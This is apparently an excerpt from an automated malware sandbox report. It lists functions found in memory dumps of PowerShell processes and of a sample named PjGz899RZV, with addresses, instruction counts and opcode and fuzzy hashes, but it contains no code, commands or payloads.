                                                                      • Opcode Fuzzy Hash: bf57c2cae731ddb52a5131212f692e2bcd333364dcb22a9b0f5c87edce2c85bf
                                                                      • Instruction Fuzzy Hash: 6B2104B7708465AFD3167BBDB8149EA3744CFA433478503B2E199DB0A3F918A4868AC0

                                                                      Executed Functions

                                                                      Function 00007FFD3457644D Relevance: .7, Instructions: 735COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 978566ec2e25a9b229c7a5cc126b70c0bd81af9c447943577f98308ec499ee73
                                                                      • Instruction ID: 6ba5d610c0418945cb9285b538dbbfd91d38995f95675e36c0d810ece5510250
                                                                      • Opcode Fuzzy Hash: 978566ec2e25a9b229c7a5cc126b70c0bd81af9c447943577f98308ec499ee73
                                                                      • Instruction Fuzzy Hash: 87D17031E1CA4D8FDF99DF58C8A5AA97BE1FF69310F14417AD409D7296CA38E841CB80
                                                                      Function 00007FFD34579EED Relevance: .3, Instructions: 287COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a614037e3ed836e92f8c7a532f04fd03bf4a52f2e90286f72c2c2b27033d425
                                                                      • Instruction ID: 6083fd7ff451f9b04a80c1e396e7a00ff08f28e0dc80794d319dca826f8def5f
                                                                      • Opcode Fuzzy Hash: 6a614037e3ed836e92f8c7a532f04fd03bf4a52f2e90286f72c2c2b27033d425
                                                                      • Instruction Fuzzy Hash: FE91F763E0D5825FFB576B6C6CF60E63FA0EF53368B0841B3C588CA093EE1D68469651
                                                                      Function 00007FFD34644073 Relevance: .2, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2337400903.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 464688edc88a142022f4eee9fac9b69fd8aec1a426af7c371151bec4ab89b68d
                                                                      • Instruction ID: 92d8eeb4698e5b7c7a112d36832027c252dc0c91edcda4335ba5f3b65f8e09e4
                                                                      • Opcode Fuzzy Hash: 464688edc88a142022f4eee9fac9b69fd8aec1a426af7c371151bec4ab89b68d
                                                                      • Instruction Fuzzy Hash: 8751F832B0DAA64FEB99DF1C54A26B477D2EF96210B1801BAC25DC7393DD19EC158341
                                                                      Function 00007FFD34644370 Relevance: .1, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2337400903.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43b4e8a412e5f7a76f2ad06c44c0079394c67f67173e1b1a4b58d21a9e96c701
                                                                      • Instruction ID: 1c76f7fd049c08a837a7c9d9acfa33da3886af7fa27b508e568582603346f9ab
                                                                      • Opcode Fuzzy Hash: 43b4e8a412e5f7a76f2ad06c44c0079394c67f67173e1b1a4b58d21a9e96c701
                                                                      • Instruction Fuzzy Hash: BE410632B0DA994FEBAADB6864A26F477D1EF46720B0801BAD14DC7293D91CAC148341
                                                                      Function 00007FFD34579750 Relevance: .1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97cb02912a11c6e429742bbdabe1d0cc387183db4ab88c6489fc9a6d06991233
                                                                      • Instruction ID: cb00221ca2dda53af278f46cfd85e93a5ac506f5def082b2e353bb02110979ba
                                                                      • Opcode Fuzzy Hash: 97cb02912a11c6e429742bbdabe1d0cc387183db4ab88c6489fc9a6d06991233
                                                                      • Instruction Fuzzy Hash: 1541093190DA884FEB09DF1C9C0A6B97FE1FB56310F04816FD449D3292DA64A805CBC2
                                                                      Function 00007FFD3445EE20 Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2335874658.00007FFD3445D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3445D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd3445d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfcac9787d188d82af11a8661da2528433ad20889ffd9f9b4540d198a7e944d9
                                                                      • Instruction ID: 4fbdcb3064fbfa539a34d4cb6423bcb3e9aa12345b723b2975868f2946c37e1f
                                                                      • Opcode Fuzzy Hash: cfcac9787d188d82af11a8661da2528433ad20889ffd9f9b4540d198a7e944d9
                                                                      • Instruction Fuzzy Hash: 5341497180DBC45FE7568B3898919523FF0EF53320B1A05EFD088CB0A7D629AC46C7A2
                                                                      Function 00007FFD3457A49C Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29ca61ed858c2622506a8a0bab239ed142e1ebb74c87548d64f6c969d3cc143f
                                                                      • Instruction ID: 2194a2d60d241102e583b7290aa4ad7719d920dc7d3bd723dad74b929e022658
                                                                      • Opcode Fuzzy Hash: 29ca61ed858c2622506a8a0bab239ed142e1ebb74c87548d64f6c969d3cc143f
                                                                      • Instruction Fuzzy Hash: 7E210A3190C64C4FEB59DF9C984A7E97FF0EB66321F04416BD449C3166DA74A80ACB91
                                                                      Function 00007FFD346440BF Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2337400903.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf12280e42b071f904a845a7976f2f841c81b4344d5c9729c3485264fb08c356
                                                                      • Instruction ID: ac56bf28c58f0b32aa506cd0cd7c8710c27778d1455b088f75da4823f69204ce
                                                                      • Opcode Fuzzy Hash: cf12280e42b071f904a845a7976f2f841c81b4344d5c9729c3485264fb08c356
                                                                      • Instruction Fuzzy Hash: DC210632B0DAA74FEBA9DF1854F22B466D2EF66210B5901BAC25DC72A3CD1DEC059300
                                                                      Function 00007FFD346443BC Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2337400903.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9456da09052cec45f73c5b32bed8519687035f8dd8c996c54bd8b60b336f4165
                                                                      • Instruction ID: 4680c8a806c84e375d6a790f799bd31b3e768fea1d7c842165a297f39e0483a6
                                                                      • Opcode Fuzzy Hash: 9456da09052cec45f73c5b32bed8519687035f8dd8c996c54bd8b60b336f4165
                                                                      • Instruction Fuzzy Hash: 1C11E332B0E6950FEAA6DF1854A66F87BD1EF06724B5800FAD15DC7692D91CAC009341
                                                                      Function 00007FFD3464681E Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2337400903.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab5041e2a5c749e870dd62efb500f503e0646a8df6879f41e0bd37ed964460d6
                                                                      • Instruction ID: feadb407399a463011dfa55aa8ccc5ffbc92e58af0d6d543a740f245afe3c36a
                                                                      • Opcode Fuzzy Hash: ab5041e2a5c749e870dd62efb500f503e0646a8df6879f41e0bd37ed964460d6
                                                                      • Instruction Fuzzy Hash: C9110231B0D7884FEB55DE9890A42A87BD1EF49320B0401BEC54DDB193DA2CA845C361
                                                                      Function 00007FFD345733B5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction ID: 6092f30a2067239bc618a92cdbe94799d7b05a720db2ac052bb5579e628d6b94
                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction Fuzzy Hash: EA01677121CB0C4FD754EF0CE451AA5B7E0FB95364F10056DE58AC36A5DB36E882CB45

                                                                      Non-executed Functions

                                                                      Function 00007FFD34578BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2336578401.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                      • API String ID: 0-2350917820
                                                                      • Opcode ID: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                                      • Instruction ID: ccd25c488b4b6f3f459c233b8048258924ba4a671cdd2c56a9fe1a85bbffb6e0
                                                                      • Opcode Fuzzy Hash: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                                      • Instruction Fuzzy Hash: 3D21F673B085156BCE1637BDB8915D97799DF6437834902F3E118EF123DD18E88B8680

                                                                      Executed Functions

                                                                      Function 00007FFD34579CD8 Relevance: .5, Instructions: 471COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a2840fb18dfd803fb3ef1c0d67470c1afdbb34b56d593d63e9d157995585fcb
                                                                      • Instruction ID: 5d62c8f9c1eb34afa6e86ef6c3f98b8c23b0e3fecf6bc625ac0d00872d208b65
                                                                      • Opcode Fuzzy Hash: 7a2840fb18dfd803fb3ef1c0d67470c1afdbb34b56d593d63e9d157995585fcb
                                                                      • Instruction Fuzzy Hash: 9BE1D563E0E6C21FFB17576C5CF61E63FA0EF13228B0941B7C598CA093EE1D68469661
                                                                      Function 00007FFD34579718 Relevance: .1, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9bd06bff4ab1ba1db4f530c66530cec9cbd6eaebd9b343afeca91c4fdfd11dd
                                                                      • Instruction ID: d4b4916a817e4e3de3188d8fbeb21aa0b59d4c77be11e7654a10bb74a2332487
                                                                      • Opcode Fuzzy Hash: f9bd06bff4ab1ba1db4f530c66530cec9cbd6eaebd9b343afeca91c4fdfd11dd
                                                                      • Instruction Fuzzy Hash: BB41E872E0CA884FEB59DF5C5C5A6A9BFE0FB56310F04817FD449C3292DB24A8158BD2
                                                                      Function 00007FFD34579FF3 Relevance: .1, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 168e709e1da9267e2f1d0b37e37da5e232c19f3ff636949281298af9fe657dfe
                                                                      • Instruction ID: 690e214f48870aa5f88a39de68ae2d512e685fab4118d34e199181fa255d6e59
                                                                      • Opcode Fuzzy Hash: 168e709e1da9267e2f1d0b37e37da5e232c19f3ff636949281298af9fe657dfe
                                                                      • Instruction Fuzzy Hash: 8541E677E0D9D20FEB539B5CACF60E63FE0EF12319B0845B3C598CA053ED1A68469681
                                                                      Function 00007FFD3445ED40 Relevance: .1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2499292617.00007FFD3445D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3445D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd3445d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c3ddb796a1945b5eea0afaddcaa679f3068b1c43ee1b5b24fe51c9131418f7
                                                                      • Instruction ID: 0b8036077d96f153f629946ac1dd8de8b1226da08503bb97919b73837534cd46
                                                                      • Opcode Fuzzy Hash: 80c3ddb796a1945b5eea0afaddcaa679f3068b1c43ee1b5b24fe51c9131418f7
                                                                      • Instruction Fuzzy Hash: 4441297140DBC44FE7579B3998919523FF0EF57320B2A05EFD088CB1A7D629A84AC792
                                                                      Function 00007FFD3457A47C Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5dd1c4355c0353335f4ca2bbe176a6331976acef1abee6e7e44267a28eb20889
                                                                      • Instruction ID: 29a4378a1f61c67d952f5e332cadc5c936522c5f57d78ccde521cc18d9e3f9fe
                                                                      • Opcode Fuzzy Hash: 5dd1c4355c0353335f4ca2bbe176a6331976acef1abee6e7e44267a28eb20889
                                                                      • Instruction Fuzzy Hash: 9121FB31D0C74C4FDB59DB5C9C8A7E97FE0EB96321F04416BD049C3152DA79A81AC791
                                                                      Function 00007FFD3464681E Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2502076867.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 255af419fc5b9ace926687bc526625b49e11a156cdc261393aa69f0e1631af2e
                                                                      • Instruction ID: f53f609acde4c3e5f257309ea0f8bc2e2c6389267de97f7449d9a4ffe54ce9f7
                                                                      • Opcode Fuzzy Hash: 255af419fc5b9ace926687bc526625b49e11a156cdc261393aa69f0e1631af2e
                                                                      • Instruction Fuzzy Hash: 30110232B0D7884FEB51DE9890A42A87BD1EF49320B0401BEC54DDB193DA2CA845C361
                                                                      Function 00007FFD345733B5 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction ID: 6092f30a2067239bc618a92cdbe94799d7b05a720db2ac052bb5579e628d6b94
                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                      • Instruction Fuzzy Hash: EA01677121CB0C4FD754EF0CE451AA5B7E0FB95364F10056DE58AC36A5DB36E882CB45
                                                                      Function 00007FFD3464414D Relevance: .0, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2502076867.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd5c2f273fa0eed1aed49fb874299fc6c8f75e92b955e214f52f7535be45907c
                                                                      • Instruction ID: 4ff93fd7b6f1f97afcffc89519c36652391c0fc23e0ad793985728a4653cc099
                                                                      • Opcode Fuzzy Hash: dd5c2f273fa0eed1aed49fb874299fc6c8f75e92b955e214f52f7535be45907c
                                                                      • Instruction Fuzzy Hash: C2F0BE32B0CA548FDB68EE8CE4915E873E1EF5532071100BAE15DC7263CA3AEC41C780
                                                                      Function 00007FFD34644400 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2502076867.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6896ab48d336209a55220977e60d54f2dceb8d820dd43a293462374765cf1d13
                                                                      • Instruction ID: ac172a6e02dc0e58f84b0c877639e5ebb488968c040de6e94a6a788dec7328a5
                                                                      • Opcode Fuzzy Hash: 6896ab48d336209a55220977e60d54f2dceb8d820dd43a293462374765cf1d13
                                                                      • Instruction Fuzzy Hash: CCF05E32B0C6548FDB54EE8CE4955E877E0EF46324B5500B6E25DC7563DA2AAC41C750
                                                                      Function 00007FFD346441D1 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2502076867.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34640000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction ID: 1b079d74e09e6eb661c36e8d124b3c3ca15df215abcb1a38cfbb7ac3ea6fb708
                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                      • Instruction Fuzzy Hash: 29E04F31B0C8288FDA68DE0CE091AF973E1EF9933171101B7D24EC7661CA26EC51DB80

                                                                      Non-executed Functions

                                                                      Function 00007FFD34578BE8 Relevance: 5.1, Strings: 4, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2500854967.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd34570000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K_^<$K_^F$K_^I$K_^J
                                                                      • API String ID: 0-2878700065
                                                                      • Opcode ID: aff2fa99849d1d305d655624992f654ed7df02afc2a94be0e41c71f187db51ab
                                                                      • Instruction ID: 4b41ba7ea1be7f3a3e4be120641ae33877349dc13b985b56f36de4cc7b5cd470
                                                                      • Opcode Fuzzy Hash: aff2fa99849d1d305d655624992f654ed7df02afc2a94be0e41c71f187db51ab
                                                                      • Instruction Fuzzy Hash: 5231207770C52A2FEA1537EDB8505DE6798DBA43B934842B3D298DB423D914E48B86C0

                                                                      Executed Functions

                                                                      Function 00007FFD34540E89 Relevance: .7, Instructions: 747COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc35ac08c8523e9aaed12c36bdc4768bdb69c062a3cbda414b9cda2975209bfe
                                                                      • Instruction ID: a7fdcc60f038e450924cff18dd920faf5cf8ebad2024730673e5d0e6bb3c5f71
                                                                      • Opcode Fuzzy Hash: bc35ac08c8523e9aaed12c36bdc4768bdb69c062a3cbda414b9cda2975209bfe
                                                                      • Instruction Fuzzy Hash: AD32BD21B1CA4A4BE7A9FB6984A97B977D2FF99300F540179E40ED73D2CE2DAC018741
                                                                      Function 00007FFD34541959 Relevance: .2, Instructions: 209COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ce7681261cc58943818bb92e444b0d91c83ee8b10e1f7387480ec7e45f8846c
                                                                      • Instruction ID: 216e79f097c224aaf661d54b90987a8fd8ef5b715eff076a4c042ea77e6d5948
                                                                      • Opcode Fuzzy Hash: 7ce7681261cc58943818bb92e444b0d91c83ee8b10e1f7387480ec7e45f8846c
                                                                      • Instruction Fuzzy Hash: 6F51EE11B5E6C94FE797A7B948782756FE49F8721AB0804FAE0CDCB2A7DD4C5806C342
                                                                      Function 00007FFD345407D0 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <O_^
                                                                      • API String ID: 0-1368354704
                                                                      • Opcode ID: c7547f3ab7bdb54d6a6af7cd7cfbac34a5eec3ed948ab2575563418751b80305
                                                                      • Instruction ID: 90d1ff6e1d794d20a4b3fbd5197a9d86e493540f2532289dd95b9bd69d320af9
                                                                      • Opcode Fuzzy Hash: c7547f3ab7bdb54d6a6af7cd7cfbac34a5eec3ed948ab2575563418751b80305
                                                                      • Instruction Fuzzy Hash: 5D81AC22F1C65A5BE799F7A880A52F977E1EF89314B904079E50DDB3C3DE2CAC019740
                                                                      Function 00007FFD34540C0E Relevance: .3, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0b6a3493a7793e522633f96558cd9dd42fdb53adcbbe34acd42e643de7898add
                                                                      • Instruction ID: 6bbca0c7e987b5234925aad396f0d69fcb421af5b8c7dd9d6e393b67cb7d910a
                                                                      • Opcode Fuzzy Hash: 0b6a3493a7793e522633f96558cd9dd42fdb53adcbbe34acd42e643de7898add
                                                                      • Instruction Fuzzy Hash: 0D714C22F1DA8A4FE796E76C94661B97BE1EF8A321B4400BAD44DD7293CD2C6C468350
                                                                      Function 00007FFD345404D8 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43cc8bd3abd0ab5b6f89e65fb73fabf73dccae09acf38b26188239518e58e68f
                                                                      • Instruction ID: 2e9e06ef80d18c425f909e5e24b8c4e876fa836924005686be6bee11af55e832
                                                                      • Opcode Fuzzy Hash: 43cc8bd3abd0ab5b6f89e65fb73fabf73dccae09acf38b26188239518e58e68f
                                                                      • Instruction Fuzzy Hash: A9319521B1C9490FE798EB6D946A379A7C2EF9D356F0405BEE04ED32D3DD68AC418341
                                                                      Function 00007FFD34540AA9 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74543e5ba2f9f1453913b0bd343b0b830164f524bb411f8c8a1eb8c4b929c723
                                                                      • Instruction ID: 304f23c52a8389583be6abf89b3379cfbd9877f0c2c1e2344c155b660d85cd41
                                                                      • Opcode Fuzzy Hash: 74543e5ba2f9f1453913b0bd343b0b830164f524bb411f8c8a1eb8c4b929c723
                                                                      • Instruction Fuzzy Hash: EB31B222F18A094FFB55ABBC58693BD77D2EF99711F14017AE00CD72A2DD2C98418791
                                                                      Function 00007FFD34540961 Relevance: .1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2688980024.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_7ffd34540000_PjGz899RZV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37a21a823b1d00b4f9e4a157df1e311c6e9c01c5944370359b92271c100df14a
